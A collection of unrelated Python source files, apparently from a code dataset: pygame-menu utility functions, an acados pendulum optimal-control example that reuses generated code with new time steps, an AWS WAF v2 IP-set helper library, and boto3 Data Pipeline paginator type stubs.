finger_pos = (int(event.x * display_size[0]), int(event.y * display_size[1]))
return finger_pos
return event.pos
def is_callable(func: Any) -> bool:
"""
Return ``True`` if ``func`` is callable.
:param func: Function object
:return: ``True`` if function
"""
# noinspection PyTypeChecker
return isinstance(func, (types.FunctionType, types.BuiltinFunctionType,
types.MethodType, functools.partial))
def load_pygame_image_file(image_path: str, **kwargs) -> 'pygame.Surface':
"""
Loads an image and returns a surface.
:param image_path: Image file
:param kwargs: Optional keyword arguments
:return: Surface
"""
# Try to load the image
try:
if 'test' in kwargs.keys():
raise pygame.error('File is not a Windows BMP file')
surface = pygame.image.load(image_path)
except pygame.error as exc:
# Check if file is not a windows file
if str(exc) == 'File is not a Windows BMP file':
pil_invalid_exception = Exception
# Check if Pillow exists
try:
# noinspection PyPackageRequirements
from PIL import Image, UnidentifiedImageError
pil_invalid_exception = UnidentifiedImageError
img_pil = Image.open(image_path)
surface = pygame.image.fromstring(
img_pil.tobytes(), img_pil.size, img_pil.mode).convert()
except (ModuleNotFoundError, ImportError):
warn(f'Image file "{image_path}" could not be loaded, as pygame.error '
f'is raised. To avoid this issue install the Pillow library')
raise
except pil_invalid_exception:
warn(f'The image "{image_path}" could not be loaded using Pillow')
raise
else:
raise
return surface
def make_surface(
width: NumberType,
height: NumberType,
alpha: bool = False,
fill_color: Optional[ColorInputType] = None
) -> 'pygame.Surface':
"""
Creates a pygame surface object.
:param width: Surface width
:param height: Surface height
:param alpha: Enable alpha channel on surface
:param fill_color: Fill surface with a certain color
:return: Pygame surface
"""
assert isinstance(width, NumberInstance)
assert isinstance(height, NumberInstance)
assert isinstance(alpha, bool)
assert width >= 0 and height >= 0, \
'surface width and height must be equal or greater than zero'
surface = pygame.Surface((int(width), int(height)), pygame.SRCALPHA, 32) # lgtm [py/call/wrong-arguments]
if alpha:
# noinspection PyArgumentList
surface = pygame.Surface.convert_alpha(surface)
if fill_color is not None:
fill_color = assert_color(fill_color)
surface.fill(fill_color)
return surface
def mouse_motion_current_mouse_position() -> EventType:
"""
Return a pygame event type MOUSEMOTION in the current mouse position.
:return: Event
"""
x, y = pygame.mouse.get_pos()
return pygame.event.Event(pygame.MOUSEMOTION, {'pos': (int(x), int(y))})
def parse_padding(padding: PaddingType) -> Tuple4IntType:
"""
Get the padding value from tuple.
- If an integer or float is provided: top, right, bottom and left values will be the same
- If 2-item tuple is provided: top and bottom takes the first value, left and right the second
- If 3-item tuple is provided: top will take the first value, left and right the second, and bottom the third
- If 4-item tuple is provided: padding will be (top, right, bottom, left)
.. note::
See `CSS W3Schools <https://www.w3schools.com/css/css_padding.asp>`_ for more info about padding.
:param padding: Can be a single number, or a tuple of 2, 3 or 4 elements following CSS style
:return: Padding value, (top, right, bottom, left), in px
"""
if padding is False or padding is None:
padding = 0
assert isinstance(padding, PaddingInstance)
if isinstance(padding, NumberInstance):
assert padding >= 0, 'padding cannot be a negative number'
return int(padding), int(padding), int(padding), int(padding)
else:
assert 1 <= len(padding) <= 4, 'padding must be a tuple of 2, 3 or 4 elements'
for i in range(len(padding)):
assert isinstance(padding[i], NumberInstance), \
'all padding elements must be integers or floats'
assert padding[i] >= 0, \
'all padding elements must be equal or greater than zero'
if len(padding) == 1:
return int(padding[0]), int(padding[0]), int(padding[0]), int(padding[0])
elif len(padding) == 2:
return int(padding[0]), int(padding[1]), int(padding[0]), int(padding[1])
elif len(padding) == 3:
return int(padding[0]), int(padding[1]), int(padding[2]), int(padding[1])
else:
return int(padding[0]), int(padding[1]), int(padding[2]), int(padding[3])
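# Illustrative sketch of the CSS-style expansion described in the docstring above
# (not part of the original module); results are (top, right, bottom, left):
#   parse_padding(5)           -> (5, 5, 5, 5)
#   parse_padding((5, 10))     -> (5, 10, 5, 10)
#   parse_padding((5, 10, 15)) -> (5, 10, 15, 10)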
def print_menu_widget_structure(
widgets: List['pygame_menu.widgets.Widget'],
index: int
) -> None:
"""
Test printing widgets order.
.. note::
- Φ Floating status
- ⟵ Selected
- !▲ Widget is not appended to current menu
- ╳ Widget is hidden
- ∑ Scrollable frame sizing
- β Widget is not selectable
- {x,y} Widget *column, row* position
- <x,y> Frame indices (min, max)
:param widgets: Menu widgets list
:param index: Menu index
:return: None
"""
indx = 0
current_depth = 0
depth_widths = {}
c = TerminalColors
def close_frames(depth: int) -> None:
"""
Close frames up to current depth.
:param depth: Depth to close
:return: None
"""
d = current_depth - depth
for i in range(d):
j = depth + d - (i + 1) # Current depth
line = f'· {"│ " * j}└{"┄" * 3}' # * depth_widths[j]
print(c.BRIGHT_WHITE + line.ljust(0, '━') + c.ENDC) # 80 also work
non_menu_frame_widgets: Dict[int, List['pygame_menu.widgets.Widget']] = {}
def process_non_menu_frame(w_indx: int) -> None:
"""
Print non-menu frames list.
:param w_indx: Current iteration index to print widgets
:return: None
"""
for nmi in list(non_menu_frame_widgets.keys()):
if nmi == w_indx:
v = non_menu_frame_widgets[nmi]
for v_wid in v:
print(c.BRIGHT_WHITE + '· ' + '│ ' * v_wid.get_frame_depth()
+ c.ENDC + widget_terminal_title(v_wid))
del non_menu_frame_widgets[nmi]
for w in widgets:
w_depth = w.get_frame_depth()
close_frames(w.get_frame_depth())
title = widget_terminal_title(w, indx, index)
print('{0}{1}{2}'.format(
str(indx).ljust(3),
' ' + c.BRIGHT_WHITE + '│ ' * w_depth + c.ENDC,
title
))
if w_depth not in depth_widths.keys():
depth_widths[w_depth] = 0
# depth_widths[w_depth] = max(int(len(title) * 1.2) + 3, depth_widths[w_depth])
depth_widths[w_depth] = len(title) - 2
current_depth = w.get_frame_depth()
process_non_menu_frame(indx)
jw = widgets[0]
try:
if isinstance(w, pygame_menu.widgets.Frame): # Print ordered non-menu widgets
current_depth += 1
prev_indx = indx
for jw in w.get_widgets(unpack_subframes=False):
if jw.get_menu() is None or jw not in widgets:
if prev_indx not in non_menu_frame_widgets.keys():
non_menu_frame_widgets[prev_indx] = []
non_menu_frame_widgets[prev_indx].append(jw)
else:
prev_indx = widgets.index(jw)
except ValueError as e:
print(f'[ERROR] while requesting widget {jw.get_class_id()}')
warn(str(e))
indx += 1
process_non_menu_frame(indx)
close_frames(0)
def set_pygame_cursor(cursor: CursorInputType) -> None:
"""
Set pygame cursor.
:param cursor: Cursor object
:return: None
"""
try:
if cursor is not None:
# noinspection PyArgumentList
pygame.mouse.set_cursor(cursor)
except (pygame.error, TypeError):
if PYGAME_V2:
warn(f'could not establish widget cursor, invalid value {cursor}')
def uuid4(short: bool = False) -> str:
"""
Create custom version of uuid4.
:param short: If ``True`` returns only the first 8 chars of the uuid, else the first 18
:return: UUID string (18 chars, or 8 if ``short``)
"""
return str(uuid.uuid4())[:18 if not short else 8]
def warn(message: str, print_stack: bool = True) -> None:
"""
Warnings warn method.
:param message: Message to warn about
:param print_stack: Print stack trace of the call
:return: None
"""
assert isinstance(message, str)
# noinspection PyUnresolvedReferences,PyProtectedMember
frame = sys._getframe().f_back
# frame_info = inspect.getframeinfo(frame) # Traceback(filename, lineno, function, code_context, index)
# Check if message in dict
msg_hash = hash(message)
msg_in_hash = False
try:
msg_in_hash = WARNINGS_LAST_MESSAGES[msg_hash]
except KeyError:
pass
if not msg_in_hash and print_stack:
traceback.print_stack(frame, limit=5)
WARNINGS_LAST_MESSAGES[msg_hash] = True
# warnings.showwarning(message, UserWarning, frame_info[0], frame_info[1])
warnings.warn(message, stacklevel=2)
def widget_terminal_title(
widget: 'pygame_menu.widgets.Widget',
widget_index: int = -1,
current_index: int = -1
) -> str:
"""
Return widget title to be printed on terminals.
:param widget: Widget to get title from
:param widget_index: Widget index
:param current_index: Menu index
:return: Widget title
"""
w_class_id = TerminalColors.BOLD + widget.get_class_id() + TerminalColors.ENDC
if isinstance(widget, pygame_menu.widgets.Frame):
w_title = TerminalColors.BRIGHT_WHITE + '┌━' + TerminalColors.ENDC
w_title += '{0} - {3}[{1},{2},'.format(w_class_id, *widget.get_indices(), TerminalColors.LGREEN)
if widget.horizontal:
w_title += 'H] '
else:
w_title += 'V] '
if widget.is_scrollable:
wsz = widget.get_inner_size()
wsm = widget.get_max_size()
wsh = wsm[0] if wsm[0] == wsz[0] else f'{wsm[0]}→{wsz[0]}'
wsv = wsm[1] if wsm[1] == wsz[1] else f'{wsm[1]}→{wsz[1]}'
w_title += f'∑ [{wsh},{wsv}] '
w_title += TerminalColors.ENDC
else:
if widget.get_title() != '':
title_f = TerminalColors.UNDERLINE + widget.get_title() + TerminalColors.ENDC
w_title = f'{w_class_id} - {title_f} - '
else:
w_title = w_class_id + ' - '
# Column/Row position
w_title += TerminalColors.INDIGO
cr = widget.get_col_row_index()
w_title += '{' + str(cr[0]) + ',' + str(cr[1]) + '}'
w_title += TerminalColors.ENDC
# Add position
w_title += TerminalColors.MAGENTA
w_title += ' ({0},{1})'.format(*widget.get_position())
w_title += TerminalColors.ENDC
# Add size
w_title += TerminalColors.BLUE
w_title += ' ({0},{1})'.format(*widget.get_size())
w_title += TerminalColors.ENDC
# Add mods
w_title += TerminalColors.CYAN
if widget.is_floating():
w_title += ' Φ'
if not widget.is_visible():
w_title += ' ╳'
if not widget.is_selectable:
w_title += ' β'
if widget.is_selected():
w_title += TerminalColors.BOLD + ' ⟵'
if current_index != -1 and current_index != widget_index:
w_title += f'! [{widget_index}->{current_index}]'
if widget.get_menu() is None:
w_title += ' !▲'
w_title += TerminalColors.ENDC
return w_title
class TerminalColors(object):
"""
Terminal colors.
See https://www.lihaoyi.com/post/BuildyourownCommandLinewithANSIescapecodes.html.
"""
BLUE = '\u001b[38;5;27m'
BOLD = '\033[1m'
BRIGHT_MAGENTA = '\u001b[35;1m'
BRIGHT_WHITE = '\u001b[37;1m'
CYAN = '\u001b[36m'
ENDC = '\u001b[0m'
GRAY = '\u001b[30;1m'
INDIGO = '\u001b[38;5;129m'
LGREEN = '\u001b[38;5;150m'
MAGENTA = '\u001b[35m'
RED = '\u001b[31m'
UNDERLINE = '\033[4m'
|
examples/acados_python/getting_started/ocp/minimal_example_ocp_reuse_code.py
|
schwieni/acados
| 322 |
70109
|
# Minimal example showing how to reuse the exported c-code with
# different time-steps.
#
# There are two use-cases demonstrated here. One use-case is to change
# the length of the time-steps vector (this results in a different
# N). Another use-case is to change the final time but keep the number
# of shooting nodes identical. Reusing the exported code with varying
# N can be useful especially in a C-only application where the process
# of code generation should only be done once.
#
# This example is an extension of the 'minimal_example_ocp.py' example.
#
# Copyright 2021 <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>, <NAME>, <NAME>, <NAME>, <NAME>,
# <NAME>
#
# This file is part of acados.
#
# The 2-Clause BSD License
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
#
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.;
#
import os
import sys
sys.path.insert(0, '../common')
from acados_template import AcadosOcp, AcadosOcpSolver
from pendulum_model import export_pendulum_ode_model
import numpy as np
import scipy.linalg
from utils import plot_pendulum
print('This example demonstrates 2 use-cases for reuse of the code export.')
# create ocp object to formulate the OCP
ocp = AcadosOcp()
# set model
model = export_pendulum_ode_model()
ocp.model = model
nx = model.x.size()[0]
nu = model.u.size()[0]
ny = nx + nu
ny_e = nx
# define the different options for the use-case demonstration
N0 = 20 # original number of shooting nodes
N12 = 15 # change the number of shooting nodes for use-cases 1 and 2
Tf_01 = 1.0 # original final time and for use-case 1
Tf_2 = Tf_01 * 0.7 # change final time for use-case 2 (but keep N identical)
# set dimensions
ocp.dims.N = N0
# set cost
Q = 2 * np.diag([1e3, 1e3, 1e-2, 1e-2])
R = 2 * np.diag([1e-2])
ocp.cost.W_e = Q
ocp.cost.W = scipy.linalg.block_diag(Q, R)
ocp.cost.cost_type = 'LINEAR_LS'
ocp.cost.cost_type_e = 'LINEAR_LS'
ocp.cost.Vx = np.zeros((ny, nx))
ocp.cost.Vx[:nx, :nx] = np.eye(nx)
Vu = np.zeros((ny, nu))
Vu[4, 0] = 1.0
ocp.cost.Vu = Vu
ocp.cost.Vx_e = np.eye(nx)
ocp.cost.yref = np.zeros((ny,))
ocp.cost.yref_e = np.zeros((ny_e,))
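# Note (added comment): with LINEAR_LS the stage output is y = Vx @ x + Vu @ u, so the
# first nx entries of y are the states and entry nx (index 4) is the scalar input force.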
# set constraints
Fmax = 80
ocp.constraints.lbu = np.array([-Fmax])
ocp.constraints.ubu = np.array([+Fmax])
ocp.constraints.idxbu = np.array([0])
ocp.constraints.x0 = np.array([0.0, np.pi, 0.0, 0.0])
# set options
ocp.solver_options.qp_solver = 'PARTIAL_CONDENSING_HPIPM' # FULL_CONDENSING_QPOASES
# PARTIAL_CONDENSING_HPIPM, FULL_CONDENSING_QPOASES, FULL_CONDENSING_HPIPM,
# PARTIAL_CONDENSING_QPDUNES, PARTIAL_CONDENSING_OSQP
ocp.solver_options.hessian_approx = 'GAUSS_NEWTON'
ocp.solver_options.integrator_type = 'ERK'
# ocp.solver_options.print_level = 1
ocp.solver_options.nlp_solver_type = 'SQP' # SQP_RTI, SQP
# set prediction horizon
ocp.solver_options.tf = Tf_01
print(80*'-')
print('generate code and compile...')
ocp_solver = AcadosOcpSolver(ocp, json_file='acados_ocp.json')
# --------------------------------------------------------------------------------
# 0) solve the problem defined here (original from code export), analog to 'minimal_example_ocp.py'
simX0 = np.ndarray((N0 + 1, nx))
simU0 = np.ndarray((N0, nu))
print(80*'-')
print(f'solve original code with N = {N0} and Tf = {Tf_01} s:')
status = ocp_solver.solve()
if status != 0:
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
raise Exception('acados returned status {}. Exiting.'.format(status))
# get solution
for i in range(N0):
simX0[i, :] = ocp_solver.get(i, "x")
simU0[i, :] = ocp_solver.get(i, "u")
simX0[N0, :] = ocp_solver.get(N0, "x")
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
# plot but don't halt
plot_pendulum(np.linspace(0, Tf_01, N0 + 1), Fmax, simU0, simX0, latexify=False, plt_show=False, X_true_label=f'original: N={N0}, Tf={Tf_01}')
# --------------------------------------------------------------------------------
# 1) now reuse the code but set a new time-steps vector, with a new number of elements
dt1 = Tf_01 / N12
new_time_steps1 = np.tile(dt1, (N12,))  # numpy equivalent of Matlab's repmat
time1 = np.hstack([0, np.cumsum(new_time_steps1)])
simX1 = np.ndarray((N12 + 1, nx))
simU1 = np.ndarray((N12, nu))
ocp_solver.set_new_time_steps(new_time_steps1)
print(80*'-')
print(f'solve use-case 1 with N = {N12} (instead of {N0}) and Tf = {Tf_01} s:')
status = ocp_solver.solve()
if status != 0:
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
raise Exception('acados returned status {}. Exiting.'.format(status))
# get solution
for i in range(N12):
simX1[i, :] = ocp_solver.get(i, "x")
simU1[i, :] = ocp_solver.get(i, "u")
simX1[N12, :] = ocp_solver.get(N12, "x")
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
plot_pendulum(time1, Fmax, simU1, simX1, latexify=False, plt_show=False, X_true_label=f'use-case 1: N={N12}')
# --------------------------------------------------------------------------------
# 2) reuse the code again, set a new time-steps vector, only with a different final time
dt2 = Tf_2 / N12
new_time_steps2 = np.tile(dt2, (N12,))  # numpy equivalent of Matlab's repmat
time2 = np.hstack([0, np.cumsum(new_time_steps2)])
simX2 = np.ndarray((N12 + 1, nx))
simU2 = np.ndarray((N12, nu))
ocp_solver.set_new_time_steps(new_time_steps2)
print(80*'-')
print(f'solve use-case 2 with N = {N12} and Tf = {Tf_2} s (instead of {Tf_01} s):')
status = ocp_solver.solve()
if status != 0:
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
raise Exception('acados returned status {}. Exiting.'.format(status))
# get solution
for i in range(N12):
simX2[i, :] = ocp_solver.get(i, "x")
simU2[i, :] = ocp_solver.get(i, "u")
simX2[N12, :] = ocp_solver.get(N12, "x")
ocp_solver.print_statistics() # encapsulates: stat = ocp_solver.get_stats("statistics")
plot_pendulum(time2, Fmax, simU2, simX2, latexify=False, plt_show=True, X_true_label=f'use-case 2: Tf={Tf_2} s')
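# --------------------------------------------------------------------------------
# Further note (illustrative sketch, not part of the original example): assuming the
# solver accepts a non-uniform step vector, the same exported code could also be reused
# with a refined grid at the start of the horizon, e.g.:
# new_time_steps3 = np.concatenate([np.tile(0.02, (10,)), np.tile(0.10, (5,))])  # 15 steps, Tf = 0.7 s
# ocp_solver.set_new_time_steps(new_time_steps3)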
|
source/lib/waflibv2.py
|
subanishaik27/aws-waf
| 678 |
70171
|
######################################################################################################################
# Copyright 2020 Amazon.com, Inc. or its affiliates. All Rights Reserved. #
# #
# Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance #
# with the License. A copy of the License is located at #
# #
# http://www.apache.org/licenses/LICENSE-2.0 #
# #
# or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES #
# OR CONDITIONS OF ANY KIND, express or implied. See the License for the specific language governing permissions #
# and limitations under the License. #
######################################################################################################################
# import boto3
# from botocore.config import Config
from botocore.exceptions import ClientError
from ipaddress import ip_address
from backoff import on_exception, expo, full_jitter
from lib.boto3_util import create_client
API_CALL_NUM_RETRIES = 5
MAX_TIME = 20
client = create_client('wafv2')
class WAFLIBv2(object):
def __init__(self):
return
# Parse arn into ip_set_id
def arn_to_id(self, arn):
if arn == None:
return None
tmp = arn.split('/')
return tmp.pop()
# Determine network version for source_ip
def which_ip_version(self, log, source_ip):
if source_ip == None:
return None
try:
source_ip = source_ip.strip()
ip_type = "IPV%s"%ip_address(source_ip).version
return ip_type
except Exception as e:
log.error("Source ip %s is not IPV4 or IPV6.", str(source_ip))
log.error(str(e))
return None
# Append correct cidr to source_ip
def set_ip_cidr(self, log, source_ip):
if source_ip == None:
return None
try:
source_ip = source_ip.strip()
ip_type = "IPV%s"%ip_address(source_ip).version
except Exception as e:
log.error("Source ip %s is not IPV4 or IPV6.", str(source_ip))
log.error(str(e))
return None
ip_class = "32" if ip_type == "IPV4" else "128"
return str(source_ip)+"/"+str(ip_class)
# Retrieve IPSet given an ip_set_id
def get_ip_set_by_id(self, log, scope, name, ip_set_id):
try:
log.debug("[waflib:get_ip_set_by_id] Start")
response = client.get_ip_set(
Scope=scope,
Name=name,
Id=ip_set_id
)
log.debug("[waflib:get_ip_set_by_id] got ip set: \n{}.".format(response))
log.debug("[waflib:get_ip_set_by_id] End")
return response
except Exception as e:
log.error("[waflib:get_ip_set_by_id] Failed to get IPSet %s", str(ip_set_id))
log.error(str(e))
return None
# Retrieve IPSet given an ip set arn
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def get_ip_set(self, log, scope, name, arn):
try:
log.info("[waflib:get_ip_set] Start")
ip_set_id = self.arn_to_id(arn)
response = client.get_ip_set(
Scope=scope,
Name=name,
Id=ip_set_id
)
log.info("[waflib:get_ip_set] End")
return response
except Exception as e:
log.error("Failed to get IPSet %s", str(ip_set_id))
log.error(str(e))
return None
# Retrieve addresses based on ip_set_id
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def get_addresses(self, log, scope, name, arn):
try:
response = self.get_ip_set(log, scope, name, arn)
addresses = response["IPSet"]["Addresses"]
return addresses
except Exception as e:
log.error("Failed to get addresses for ARN %s", str(arn))
log.error(str(e))
return None
# Update addresses in an IPSet using ip set id
@on_exception(expo, client.exceptions.WAFOptimisticLockException,
max_time=MAX_TIME,
jitter=full_jitter,
max_tries=API_CALL_NUM_RETRIES)
def update_ip_set_by_id(self, log, scope, name, ip_set_id, addresses, lock_token, description):
log.debug("[waflib:update_ip_set_by_id] Start")
try:
response = client.update_ip_set(
Scope=scope,
Name=name,
Id=ip_set_id,
Addresses=addresses,
LockToken=lock_token,
Description=description
)
log.debug("[waflib:update_ip_set_by_id] update ip set response: \n{}.".format(response))
log.debug("[waflib:update_ip_set_by_id] End")
return response
# Get the latest ip set and retry updating api call when OptimisticLockException occurs
except ClientError as ex:
exception_type = ex.response['Error']['Code']
if exception_type in ['OptimisticLockException']:
log.info("[waflib:update_ip_set_by_id] OptimisticLockException detected. Get the latest ip set and retry updating ip set.")
ip_set = self.get_ip_set_by_id(log, scope, name, ip_set_id)
lock_token = ip_set['LockToken']
response = client.update_ip_set(
Scope=scope,
Name=name,
Id=ip_set_id,
Addresses=addresses,
LockToken=lock_token,
Description=description
)
log.debug("[waflib:update_ip_set_id] End")
return response
except Exception as e:
log.error(e)
log.error("[waflib:update_ip_set_by_id] Failed to update IPSet: %s", str(ip_set_id))
return None
# Update addresses in an IPSet using ip set arn
@on_exception(expo, client.exceptions.WAFOptimisticLockException,
max_time=MAX_TIME,
jitter=full_jitter,
max_tries=API_CALL_NUM_RETRIES)
def update_ip_set(self, log, scope, name, ip_set_arn, addresses):
log.info("[waflib:update_ip_set] Start")
if (ip_set_arn is None or name is None):
log.error("No IPSet found for: %s ", str(ip_set_arn))
return None
try:
# convert from arn to ip_set_id
ip_set_id = self.arn_to_id(ip_set_arn)
# retrieve the ipset to get a locktoken
ip_set = self.get_ip_set(log, scope, name, ip_set_arn)
lock_token = ip_set['LockToken']
description = ip_set['IPSet']['Description']
log.info("Updating IPSet with description: %s, lock token: %s", str(description), str(lock_token))
response = client.update_ip_set(
Scope=scope,
Name=name,
Description=description,
Id=ip_set_id,
Addresses=addresses,
LockToken=lock_token
)
new_ip_set = self.get_ip_set(log, scope, name, ip_set_id)
log.debug("[waflib:update_ip_set] update ip set response:\n{}".format(response))
log.info("[waflib:update_ip_set] End")
return new_ip_set
except Exception as e:
log.error(e)
log.error("Failed to update IPSet: %s", str(ip_set_id))
return None
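# Usage sketch (illustrative; the scope, name and ARN below are hypothetical, and log is
# assumed to be a standard logger):
#   waflib = WAFLIBv2()
#   waflib.update_ip_set(log, "REGIONAL", "ExampleIPSet",
#                        "arn:aws:wafv2:us-east-1:111122223333:regional/ipset/ExampleIPSet/abcd1234",
#                        ["203.0.113.7/32"])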
# Put Log Configuration for webacl
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def put_logging_configuration(self, log, web_acl_arn, delivery_stream_arn):
try:
response = client.put_logging_configuration(
LoggingConfiguration={
'ResourceArn': web_acl_arn,
'LogDestinationConfigs': [delivery_stream_arn]
}
)
return response
except Exception as e:
log.error("Failed to configure log for WebAcl: %s", str(web_acl_arn))
log.error(str(e))
return None
# Delete Log Configuration for webacl
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def delete_logging_configuration(self, log, web_acl_arn):
try:
response = client.delete_logging_configuration(
ResourceArn=web_acl_arn
)
return response
except Exception as e:
log.error("Failed to delete log for WebAcl: %s", str(web_acl_arn))
log.error(str(e))
return None
# List webacls
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def list_web_acls(self, log, scope):
try:
response = client.list_web_acls(
Scope=scope
)
return response
except Exception as e:
log.error("Failed to list WebAcld in scope: %s", str(scope))
log.error(str(e))
return None
# log when retry is stopped
# def give_up_retry(self, log, e):
# log.error("Giving up retry after %s times.",str(API_CALL_NUM_RETRIES))
# log.error(e)
#################################################################
# Following functions only used for testing, not in WAF Solution
#################################################################
@on_exception(expo,
(client.exceptions.WAFInternalErrorException,
client.exceptions.WAFOptimisticLockException,
client.exceptions.WAFLimitsExceededException),
max_time=MAX_TIME)
def create_ip_set(self, log, scope, name, description, version, addresses):
try:
response = client.create_ip_set(
Scope=scope,
Name=name,
Description=description,
IPAddressVersion=version,
Addresses=addresses
)
return response
except Exception as e:
log.error("Failed to create IPSet: %s", str(name))
log.error(str(e))
return None
@on_exception(expo,
(client.exceptions.WAFInternalErrorException,
client.exceptions.WAFOptimisticLockException,
client.exceptions.WAFAssociatedItemException),
max_time=MAX_TIME)
def delete_ip_set(self, log, scope, name, ip_set_id):
try:
response = self.get_ip_set(log, scope, name, ip_set_id)
if response is not None:
lock_token = response['LockToken']
response = client.delete_ip_set(
Scope=scope,
Name=name,
LockToken=lock_token,
Id=ip_set_id
)
return response
except Exception as e:
log.error("Failed to delete IPSet: %s", str(name))
log.error(str(e))
return None
@on_exception(expo, client.exceptions.WAFInternalErrorException, max_time=MAX_TIME)
def list_ip_sets(self, log, scope, marker=None):
try:
response = None
if marker == None:
response = client.list_ip_sets(
Scope=scope,
Limit=50
)
else:
response = client.list_ip_sets(
Scope=scope,
NextMarker=marker,
Limit=50
)
return response
except Exception as e:
log.error("Failed to list IPSets in scope: %s", str(scope))
log.error(str(e))
return None
|
boto3_type_annotations_with_docs/boto3_type_annotations/datapipeline/paginator.py
|
cowboygneox/boto3_type_annotations
| 119 |
70175
|
from typing import Dict
from typing import List
from botocore.paginate import Paginator
class DescribeObjects(Paginator):
def paginate(self, pipelineId: str, objectIds: List, evaluateExpressions: bool = None, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.describe_objects`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/DescribeObjects>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
pipelineId='string',
objectIds=[
'string',
],
evaluateExpressions=True|False,
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'pipelineObjects': [
{
'id': 'string',
'name': 'string',
'fields': [
{
'key': 'string',
'stringValue': 'string',
'refValue': 'string'
},
]
},
],
'hasMoreResults': True|False,
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains the output of DescribeObjects.
- **pipelineObjects** *(list) --*
An array of object definitions.
- *(dict) --*
Contains information about a pipeline object. This can be a logical, physical, or physical attempt pipeline object. The complete set of components of a pipeline defines the pipeline.
- **id** *(string) --*
The ID of the object.
- **name** *(string) --*
The name of the object.
- **fields** *(list) --*
Key-value pairs that define the properties of the object.
- *(dict) --*
A key-value pair that describes a property of a pipeline object. The value is specified as either a string value (``StringValue`` ) or a reference to another object (``RefValue`` ) but not as both.
- **key** *(string) --*
The field identifier.
- **stringValue** *(string) --*
The field value, expressed as a String.
- **refValue** *(string) --*
The field value, expressed as the identifier of another object.
- **hasMoreResults** *(boolean) --*
Indicates whether there are more results to return.
- **NextToken** *(string) --*
A token to resume pagination.
:type pipelineId: string
:param pipelineId: **[REQUIRED]**
The ID of the pipeline that contains the object definitions.
:type objectIds: list
:param objectIds: **[REQUIRED]**
The IDs of the pipeline objects that contain the definitions to be described. You can pass as many as 25 identifiers in a single call to ``DescribeObjects`` .
- *(string) --*
:type evaluateExpressions: boolean
:param evaluateExpressions:
Indicates whether any expressions in the object should be evaluated when the object descriptions are returned.
:type PaginationConfig: dict
:param PaginationConfig:
A dictionary that provides parameters to control pagination.
- **MaxItems** *(integer) --*
The total number of items to return. If the total number of items available is more than the value specified in max-items then a ``NextToken`` will be provided in the output that you can use to resume pagination.
- **PageSize** *(integer) --*
The size of each page.
- **StartingToken** *(string) --*
A token to specify where to start paginating. This is the ``NextToken`` from a previous response.
:rtype: dict
:returns:
"""
pass
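# Usage sketch (illustrative; these stubs only annotate the boto3 API, so a real paginator
# comes from a boto3 client; the objectIds value below is hypothetical):
#   import boto3
#   paginator = boto3.client('datapipeline').get_paginator('describe_objects')
#   for page in paginator.paginate(pipelineId='df-297EG78HU43EEXAMPLE', objectIds=['Default']):
#       print(page['pipelineObjects'])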
class ListPipelines(Paginator):
def paginate(self, PaginationConfig: Dict = None) -> Dict:
"""
Creates an iterator that will paginate through responses from :py:meth:`DataPipeline.Client.list_pipelines`.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/datapipeline-2012-10-29/ListPipelines>`_
**Request Syntax**
::
response_iterator = paginator.paginate(
PaginationConfig={
'MaxItems': 123,
'PageSize': 123,
'StartingToken': 'string'
}
)
**Response Syntax**
::
{
'pipelineIdList': [
{
'id': 'string',
'name': 'string'
},
],
'hasMoreResults': True|False,
'NextToken': 'string'
}
**Response Structure**
- *(dict) --*
Contains the output of ListPipelines.
- **pipelineIdList** *(list) --*
The pipeline identifiers. If you require additional information about the pipelines, you can use these identifiers to call DescribePipelines and GetPipelineDefinition .
- *(dict) --*
Contains the name and identifier of a pipeline.
- **id** *(string) --*
The ID of the pipeline that was assigned by AWS Data Pipeline. This is a string of the form ``df-297EG78HU43EEXAMPLE`` .
- **name** *(string) --*
The name of the pipeline.
